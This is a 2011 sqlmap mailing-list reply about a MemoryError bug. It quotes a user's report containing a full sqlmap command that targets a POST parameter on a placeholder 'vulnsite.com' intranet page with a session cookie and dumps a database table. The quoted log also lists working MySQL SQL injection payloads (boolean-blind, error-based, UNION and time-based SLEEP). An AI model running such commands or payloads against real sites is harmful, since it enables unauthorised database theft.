Re: [sqlmap-users] Memory problems
From: Miroslav S. <mir...@gm...> - 2011-01-27 19:48:48
LOL (50,350 entries in the table and 48 columns)

we'll try to make some tests regarding this and report accordingly. haven't planned this kind of "huge" data retrievals :)

kr

On Thu, Jan 27, 2011 at 8:40 PM, David Guimaraes <sk...@gm...> wrote:
> # ./sqlmap.py --method post --cookie "PHPSESSID=7i2j7ou46iu4c62xxx4kemiql6"
> --data "vulnparam=6" -u "http://www.vulnsite.com/intranet/vulnphp.php" -v 3
> -D nomes -T class --dump
>
> sqlmap/0.9-dev - automatic SQL injection and database takeover tool
> http://sqlmap.sourceforge.net
>
> [*] starting at: 16:58:05
>
> [16:58:05] [DEBUG] cleaning up configuration parameters
> [16:58:05] [DEBUG] setting the HTTP timeout
> [16:58:05] [DEBUG] setting the HTTP Cookie header
> [16:58:05] [DEBUG] setting the HTTP method to POST
> [16:58:05] [DEBUG] creating HTTP requests opener object
> [16:58:05] [INFO] using
> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session' as session file
> [16:58:05] [INFO] resuming injection data from session file
> [16:58:05] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
> [16:58:05] [INFO] testing connection to the target url
> you provided an HTTP Cookie header value. The target url provided its own
> Cookie within the HTTP Set-Cookie header. Do you want to continue using the
> HTTP Cookie values that you provided? [Y/n]
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: POST
> Parameter: vulnparam
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: vulnparam=6 AND 5647=5647
>
> Type: error-based
> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
> Payload: vulnparam=6 AND (SELECT 714 FROM(SELECT
> COUNT(*),CONCAT(CHAR(58,111,106,112,58),(SELECT (CASE WHEN (714=714) THEN 1
> ELSE 0 END)),CHAR(58,99,99,109,58),FLOOR(RAND(0)*2))x FROM
> information_schema.tables GROUP BY x)a)
>
> Type: UNION query
> Title: MySQL UNION query (NULL) - 4 to 7 columns
> Payload: vulnparam=6 UNION ALL SELECT NULL, NULL,
> CONCAT(CHAR(58,111,106,112,58),IFNULL(CAST(CHAR(101,76,89,111) AS CHAR),
> CHAR(32)),CHAR(58,99,99,109,58)), NULL, NULL#
>
> Type: AND/OR time-based blind
> Title: MySQL > 5.0.11 AND time-based blind
> Payload: vulnparam=6 AND SLEEP(5)
> ---
>
> [16:58:06] [INFO] the back-end DBMS is MySQL
>
> web application technology: PHP 5.3.2
> back-end DBMS: MySQL 5.0
> [16:58:06] [INFO] fetching columns for table 'class' on database 'nomes'
> [16:58:06] [INFO] read from file
> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session': vulncolumns
> [16:58:06] [INFO] fetching entries for table 'class' on database 'nomes'
> [16:58:06] [PAYLOAD] 6 UNION ALL SELECT NULL, NULL,
> CONCAT(CHAR(58,101,110,122,58),XXX,CHAR(58,111,115,122,58)), NULL, NULL FROM
> nomes.class#
> [17:00:09] [DEBUG] performed 1 queries in 122 seconds
>
> [17:00:13] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run
> with the latest development version from the Subversion repository. If the
> exception persists, please send by e-mail to
> sql...@li... the command line, the following text and
> any information needed to reproduce the bug. The developers will try to
> reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 0.9-dev
> Python version: 2.6.5
> Operating system: posix
> Traceback (most recent call last):
> File "./sqlmap.py", line 83, in main
> start()
> File "/home/kkk/sqlmap-dev/lib/controller/controller.py", line 414, in
> start
> action()
> File "/home/kkk/sqlmap-dev/lib/controller/action.py", line 103, in action
> conf.dumper.dbTableValues(conf.dbmsHandler.dumpTable())
> File "/home/kkk/sqlmap-dev/plugins/generic/enumeration.py", line 1189, in
> dumpTable
> entries = inject.getValue(query, blind=False, dump=True)
> File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 427, in getValue
> value = __goInband(query, expected, sort, resumeValue, unpack, dump)
> File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 384, in __goInband
> data = parseUnionPage(output, expression, partial, None, sort)
> File "/home/kkk/sqlmap-dev/lib/core/common.py", line 785, in
> parseUnionPage
> dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url,
> kb.injection.place, conf.parameters[kb.injection.place], expression,
> logOutput))
> MemoryError
>
> [*] shutting down at: 17:00:13
>
> There are about 50,350 entries in the table and 48 columns. I tested the
> query manually, and returned a page with 600k of information. I think that
> sqlmap did not support the amount of data...?
>
> David

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia